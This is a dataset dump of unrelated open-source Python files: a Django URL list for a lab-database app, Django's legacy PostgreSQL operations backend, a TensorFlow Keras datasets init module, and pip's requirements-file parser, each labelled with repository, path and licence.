    url(r'^about_de/$', views.about_de_view, name='about_de'),
    url(r'^database_scheme/$', views.database_scheme_en_view, name='database_scheme'),
    url(r'^database_scheme_de/$', views.database_scheme_de_view, name='database_scheme_de'),
    url(r'^gal_file/$', views.gal_file_view, name='gal_file'),
    url(r'^raw_gal_file/$', views.raw_gal_file_view, name='raw_gal_file'),
    url(r'^tutorial/$', views.tutorial_en_view, name='tutorial'),
    url(r'^tree/$', views.tutorial_tree_view, name='tutorial_tree'),
    url(r'^tutorial_de/$', views.tutorial_de_view, name='tutorial_de'),
    url(r'^steps/$', views.steps_view, name='steps'),

    # Processes.
    url(r'^processes/$', views.processes_view, name='processes'),
    url(r'^process/(?P<sid>.*)/$', views.process_view, name='processview'),
    url(r'^image/processtep/(?P<id>.*)/$', views.image_process_view, name='imageviewprocess'),

    # Generic model CRUD.
    url(r'^g/(?P<model_name>.*)/new/$', views.new_view, name='new'),
    url(r'^ligandbatch/(?P<model_name>.*)/new/$', views.ligandbatch_new, name='new_ligandbatch'),
    url(r'^g/(?P<model_name>.*)/(?P<pk>.*)/delete$', views.delete_view, name='delete'),
    url(r'^g/(?P<model_name>.*)/(?P<pk>.*)/edit$', views.edit_view, name='edit'),

    # Ligands and ligand batches.
    url(r'^buffers/$', views.buffer_view, name='buffers'),
    url(r'^peptides/$', views.peptide_view, name='peptides'),
    url(r'^complexes/$', views.complex_view, name='complexes'),
    url(r'^viruses/$', views.virus_view, name='viruses'),
    url(r'^antibodies/$', views.antibody_view, name='antibodies'),
    url(r'^bufferbatches/$', views.buffer_batch_view, name='bufferbatches'),
    url(r'^peptidebatches/$', views.peptide_batch_view, name='peptidebatches'),
    url(r'^complexbatches/$', views.complex_batch_view, name='complexbatches'),
    url(r'^virusbatches/$', views.virus_batch_view, name='virusbatches'),
    url(r'^antibodybatches/$', views.antibody_batch_view, name='antibodybatches'),

    # Account management and legacy plot endpoints.
    url(r'^password/$', views.change_password_view, name='change_password'),
    url(r'^qspotcollection/(?P<sid>.*)/data$', views.barplot_data_view, name='barplot_plotly'),
    url(r'^qspotcollection/(?P<sid>.*)/barplot_p$', views.highcharts_view, name='heatmap_highchart'),
]
zzzombat/lucid-python-django | django/db/backends/postgresql/operations.py | 229 | 9420 | import re
from django.db.backends import BaseDatabaseOperations
# This DatabaseOperations class lives in here instead of base.py because it's
# used by both the 'postgresql' and 'postgresql_psycopg2' backends.
class DatabaseOperations(BaseDatabaseOperations):
    """PostgreSQL-specific SQL-generation helpers.

    Shared by both the 'postgresql' and 'postgresql_psycopg2' backends
    (see the module comment above).
    """

    def __init__(self, connection):
        super(DatabaseOperations, self).__init__()
        # Server version is resolved lazily on first property access so that
        # constructing this object does not require a live connection.
        self._postgres_version = None
        self.connection = connection

    def _get_postgres_version(self):
        # Query the server once and memoize the resulting version tuple.
        if self._postgres_version is None:
            from django.db.backends.postgresql.version import get_version
            cursor = self.connection.cursor()
            self._postgres_version = get_version(cursor)
        return self._postgres_version
    postgres_version = property(_get_postgres_version)

    def date_extract_sql(self, lookup_type, field_name):
        """Return SQL extracting the given date component from *field_name*."""
        # http://www.postgresql.org/docs/8.0/static/functions-datetime.html#FUNCTIONS-DATETIME-EXTRACT
        if lookup_type == 'week_day':
            # For consistency across backends, we return Sunday=1, Saturday=7.
            return "EXTRACT('dow' FROM %s) + 1" % field_name
        else:
            return "EXTRACT('%s' FROM %s)" % (lookup_type, field_name)

    def date_interval_sql(self, sql, connector, timedelta):
        """
        implements the interval functionality for expressions
        format for Postgres:
        (datefield + interval '3 days 200 seconds 5 microseconds')
        """
        # Only the non-zero timedelta components are emitted.
        modifiers = []
        if timedelta.days:
            modifiers.append(u'%s days' % timedelta.days)
        if timedelta.seconds:
            modifiers.append(u'%s seconds' % timedelta.seconds)
        if timedelta.microseconds:
            modifiers.append(u'%s microseconds' % timedelta.microseconds)
        mods = u' '.join(modifiers)
        conn = u' %s ' % connector
        return u'(%s)' % conn.join([sql, u'interval \'%s\'' % mods])

    def date_trunc_sql(self, lookup_type, field_name):
        """Return SQL truncating *field_name* to the given precision."""
        # http://www.postgresql.org/docs/8.0/static/functions-datetime.html#FUNCTIONS-DATETIME-TRUNC
        return "DATE_TRUNC('%s', %s)" % (lookup_type, field_name)

    def deferrable_sql(self):
        # Appended to constraint definitions so FK checks run at commit time.
        return " DEFERRABLE INITIALLY DEFERRED"

    def lookup_cast(self, lookup_type):
        """Return the placeholder/cast wrapper for the given lookup type."""
        lookup = '%s'

        # Cast text lookups to text to allow things like filter(x__contains=4)
        if lookup_type in ('iexact', 'contains', 'icontains', 'startswith',
                           'istartswith', 'endswith', 'iendswith'):
            lookup = "%s::text"

        # Use UPPER(x) for case-insensitive lookups; it's faster.
        if lookup_type in ('iexact', 'icontains', 'istartswith', 'iendswith'):
            lookup = 'UPPER(%s)' % lookup

        return lookup

    def field_cast_sql(self, db_type):
        # HOST() strips the netmask from inet values for text comparisons.
        if db_type == 'inet':
            return 'HOST(%s)'
        return '%s'

    def last_insert_id(self, cursor, table_name, pk_name):
        """Return the last value generated for *table_name*'s pk sequence."""
        # Use pg_get_serial_sequence to get the underlying sequence name
        # from the table name and column name (available since PostgreSQL 8)
        cursor.execute("SELECT CURRVAL(pg_get_serial_sequence('%s','%s'))" % (
            self.quote_name(table_name), pk_name))
        return cursor.fetchone()[0]

    def no_limit_value(self):
        # PostgreSQL accepts "LIMIT ALL" / omitted LIMIT; None means no limit.
        return None

    def quote_name(self, name):
        """Double-quote *name* as a PostgreSQL identifier (idempotent)."""
        if name.startswith('"') and name.endswith('"'):
            return name  # Quoting once is enough.
        return '"%s"' % name

    def sql_flush(self, style, tables, sequences):
        """Return SQL emptying *tables* and resetting *sequences* to 1."""
        if tables:
            if self.postgres_version[0:2] >= (8, 1):
                # Postgres 8.1+ can do 'TRUNCATE x, y, z...;'. In fact, it *has to*
                # in order to be able to truncate tables referenced by a foreign
                # key in any other table. The result is a single SQL TRUNCATE
                # statement.
                sql = ['%s %s;' % \
                    (style.SQL_KEYWORD('TRUNCATE'),
                     style.SQL_FIELD(', '.join([self.quote_name(table) for table in tables]))
                )]
            else:
                # Older versions of Postgres can't do TRUNCATE in a single call, so
                # they must use a simple delete.
                sql = ['%s %s %s;' % \
                        (style.SQL_KEYWORD('DELETE'),
                         style.SQL_KEYWORD('FROM'),
                         style.SQL_FIELD(self.quote_name(table))
                         ) for table in tables]

            # 'ALTER SEQUENCE sequence_name RESTART WITH 1;'... style SQL statements
            # to reset sequence indices
            for sequence_info in sequences:
                table_name = sequence_info['table']
                column_name = sequence_info['column']
                if not (column_name and len(column_name) > 0):
                    # This will be the case if it's an m2m using an autogenerated
                    # intermediate table (see BaseDatabaseIntrospection.sequence_list)
                    column_name = 'id'
                sql.append("%s setval(pg_get_serial_sequence('%s','%s'), 1, false);" % \
                    (style.SQL_KEYWORD('SELECT'),
                     style.SQL_TABLE(self.quote_name(table_name)),
                     style.SQL_FIELD(column_name))
                )
            return sql
        else:
            return []

    def sequence_reset_sql(self, style, model_list):
        """Return SQL re-syncing each model's pk sequence with its max pk."""
        from django.db import models
        output = []
        qn = self.quote_name
        for model in model_list:
            # Use `coalesce` to set the sequence for each model to the max pk value if there are records,
            # or 1 if there are none. Set the `is_called` property (the third argument to `setval`) to true
            # if there are records (as the max pk value is already in use), otherwise set it to false.
            # Use pg_get_serial_sequence to get the underlying sequence name from the table name
            # and column name (available since PostgreSQL 8)
            for f in model._meta.local_fields:
                if isinstance(f, models.AutoField):
                    output.append("%s setval(pg_get_serial_sequence('%s','%s'), coalesce(max(%s), 1), max(%s) %s null) %s %s;" % \
                        (style.SQL_KEYWORD('SELECT'),
                         style.SQL_TABLE(qn(model._meta.db_table)),
                         style.SQL_FIELD(f.column),
                         style.SQL_FIELD(qn(f.column)),
                         style.SQL_FIELD(qn(f.column)),
                         style.SQL_KEYWORD('IS NOT'),
                         style.SQL_KEYWORD('FROM'),
                         style.SQL_TABLE(qn(model._meta.db_table))))
                    break  # Only one AutoField is allowed per model, so don't bother continuing.
            # Auto-created m2m tables also carry an 'id' serial column.
            for f in model._meta.many_to_many:
                if not f.rel.through:
                    output.append("%s setval(pg_get_serial_sequence('%s','%s'), coalesce(max(%s), 1), max(%s) %s null) %s %s;" % \
                        (style.SQL_KEYWORD('SELECT'),
                         style.SQL_TABLE(qn(f.m2m_db_table())),
                         style.SQL_FIELD('id'),
                         style.SQL_FIELD(qn('id')),
                         style.SQL_FIELD(qn('id')),
                         style.SQL_KEYWORD('IS NOT'),
                         style.SQL_KEYWORD('FROM'),
                         style.SQL_TABLE(qn(f.m2m_db_table()))))
        return output

    def savepoint_create_sql(self, sid):
        return "SAVEPOINT %s" % sid

    def savepoint_commit_sql(self, sid):
        return "RELEASE SAVEPOINT %s" % sid

    def savepoint_rollback_sql(self, sid):
        return "ROLLBACK TO SAVEPOINT %s" % sid

    def prep_for_iexact_query(self, x):
        # No transformation needed: lookup_cast() applies UPPER() in SQL.
        return x

    def check_aggregate_support(self, aggregate):
        """Check that the backend fully supports the provided aggregate.

        The population and sample statistics (STDDEV_POP, STDDEV_SAMP,
        VAR_POP, VAR_SAMP) were first implemented in Postgres 8.2.

        The implementation of population statistics (STDDEV_POP and VAR_POP)
        under Postgres 8.2 - 8.2.4 is known to be faulty. Raise
        NotImplementedError if this is the database in use.
        """
        if aggregate.sql_function in ('STDDEV_POP', 'STDDEV_SAMP', 'VAR_POP', 'VAR_SAMP'):
            if self.postgres_version[0:2] < (8, 2):
                raise NotImplementedError('PostgreSQL does not support %s prior to version 8.2. Please upgrade your version of PostgreSQL.' % aggregate.sql_function)

        if aggregate.sql_function in ('STDDEV_POP', 'VAR_POP'):
            if self.postgres_version[0:2] == (8, 2):
                if self.postgres_version[2] is None or self.postgres_version[2] <= 4:
                    raise NotImplementedError('PostgreSQL 8.2 to 8.2.4 is known to have a faulty implementation of %s. Please upgrade your version of PostgreSQL.' % aggregate.sql_function)

    def max_name_length(self):
        """
        Returns the maximum length of an identifier.

        Note that the maximum length of an identifier is 63 by default, but can
        be changed by recompiling PostgreSQL after editing the NAMEDATALEN
        macro in src/include/pg_config_manual.h .

        This implementation simply returns 63, but can easily be overridden by a
        custom database backend that inherits most of its behavior from this one.
        """
        return 63
| bsd-3-clause |
ZhangXinNan/tensorflow | tensorflow/python/keras/datasets/__init__.py | 62 | 1264 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras built-in datasets."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.keras.datasets import boston_housing
from tensorflow.python.keras.datasets import cifar10
from tensorflow.python.keras.datasets import cifar100
from tensorflow.python.keras.datasets import fashion_mnist
from tensorflow.python.keras.datasets import imdb
from tensorflow.python.keras.datasets import mnist
from tensorflow.python.keras.datasets import reuters
del absolute_import
del division
del print_function
| apache-2.0 |
biodrone/plex-desk | desk/flask/lib/python3.4/site-packages/pip/req/req_file.py | 85 | 5511 | from __future__ import absolute_import
import os
import re
from pip._vendor.six.moves.urllib import parse as urllib_parse
from pip.download import get_file_content
from pip.req.req_install import InstallRequirement
from pip.utils import normalize_name
# Matches an explicit URL scheme prefix (http/https/file), case-insensitively.
# Used below to distinguish URLs from local filesystem paths.
_scheme_re = re.compile(r'^(http|https|file):', re.I)
def parse_requirements(filename, finder=None, comes_from=None, options=None,
                       session=None):
    """Parse a requirements file, yielding one InstallRequirement per line.

    :param filename: path or URL of the requirements file.
    :param finder: optional PackageFinder; index-url / find-links / allow-*
        options found in the file mutate it in place.
    :param comes_from: description of where this file was referenced from
        (used for nested ``-r`` includes and error messages).
    :param options: optional pip options object (isolated mode, default VCS,
        skip-requirements regex); may be None.
    :param session: requests session used to fetch remote files (required).
    :raises TypeError: if *session* is not provided.
    """
    if session is None:
        raise TypeError(
            "parse_requirements() missing 1 required keyword argument: "
            "'session'"
        )

    # Optionally skip lines matching a user-supplied regex.
    skip_match = None
    skip_regex = options.skip_requirements_regex if options else None
    if skip_regex:
        skip_match = re.compile(skip_regex)
    reqs_file_dir = os.path.dirname(os.path.abspath(filename))
    filename, content = get_file_content(
        filename,
        comes_from=comes_from,
        session=session,
    )
    for line_number, line in enumerate(content.splitlines(), 1):
        line = line.strip()

        # Remove comments from file
        line = re.sub(r"(^|\s)#.*$", "", line)

        if not line or line.startswith('#'):
            continue
        if skip_match and skip_match.search(line):
            continue
        if line.startswith('-r') or line.startswith('--requirement'):
            # Nested requirements file: recurse, resolving the path/URL
            # relative to the current file.
            if line.startswith('-r'):
                req_url = line[2:].strip()
            else:
                req_url = line[len('--requirement'):].strip().strip('=')
            if _scheme_re.search(filename):
                # Relative to a URL
                req_url = urllib_parse.urljoin(filename, req_url)
            elif not _scheme_re.search(req_url):
                req_url = os.path.join(os.path.dirname(filename), req_url)
            for item in parse_requirements(
                    req_url, finder,
                    comes_from=filename,
                    options=options,
                    session=session):
                yield item
        elif line.startswith('-Z') or line.startswith('--always-unzip'):
            # No longer used, but previously these were used in
            # requirement files, so we'll ignore.
            pass
        elif line.startswith('-f') or line.startswith('--find-links'):
            if line.startswith('-f'):
                line = line[2:].strip()
            else:
                line = line[len('--find-links'):].strip().lstrip('=')
            # FIXME: it would be nice to keep track of the source of
            # the find_links:
            # support a find-links local path relative to a requirements file
            relative_to_reqs_file = os.path.join(reqs_file_dir, line)
            if os.path.exists(relative_to_reqs_file):
                line = relative_to_reqs_file
            if finder:
                finder.find_links.append(line)
        elif line.startswith('-i') or line.startswith('--index-url'):
            # --index-url replaces the finder's index list;
            # --extra-index-url (below) appends to it.
            if line.startswith('-i'):
                line = line[2:].strip()
            else:
                line = line[len('--index-url'):].strip().lstrip('=')
            if finder:
                finder.index_urls = [line]
        elif line.startswith('--extra-index-url'):
            line = line[len('--extra-index-url'):].strip().lstrip('=')
            if finder:
                finder.index_urls.append(line)
        elif line.startswith('--use-wheel'):
            # Default in 1.5
            pass
        elif line.startswith('--no-use-wheel'):
            if finder:
                finder.use_wheel = False
        elif line.startswith('--no-index'):
            if finder:
                finder.index_urls = []
        elif line.startswith("--allow-external"):
            line = line[len("--allow-external"):].strip().lstrip("=")
            if finder:
                finder.allow_external |= set([normalize_name(line).lower()])
        elif line.startswith("--allow-all-external"):
            if finder:
                finder.allow_all_external = True
        # Remove in 7.0
        elif line.startswith("--no-allow-external"):
            pass
        # Remove in 7.0
        elif line.startswith("--no-allow-insecure"):
            pass
        # Remove after 7.0
        elif line.startswith("--allow-insecure"):
            line = line[len("--allow-insecure"):].strip().lstrip("=")
            if finder:
                finder.allow_unverified |= set([normalize_name(line).lower()])
        elif line.startswith("--allow-unverified"):
            line = line[len("--allow-unverified"):].strip().lstrip("=")
            if finder:
                finder.allow_unverified |= set([normalize_name(line).lower()])
        else:
            # Plain requirement line (optionally editable via -e/--editable).
            comes_from = '-r %s (line %s)' % (filename, line_number)
            if line.startswith('-e') or line.startswith('--editable'):
                if line.startswith('-e'):
                    line = line[2:].strip()
                else:
                    line = line[len('--editable'):].strip().lstrip('=')
                req = InstallRequirement.from_editable(
                    line,
                    comes_from=comes_from,
                    default_vcs=options.default_vcs if options else None,
                    isolated=options.isolated_mode if options else False,
                )
            else:
                req = InstallRequirement.from_line(
                    line,
                    comes_from,
                    isolated=options.isolated_mode if options else False,
                )
            yield req
| mit |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.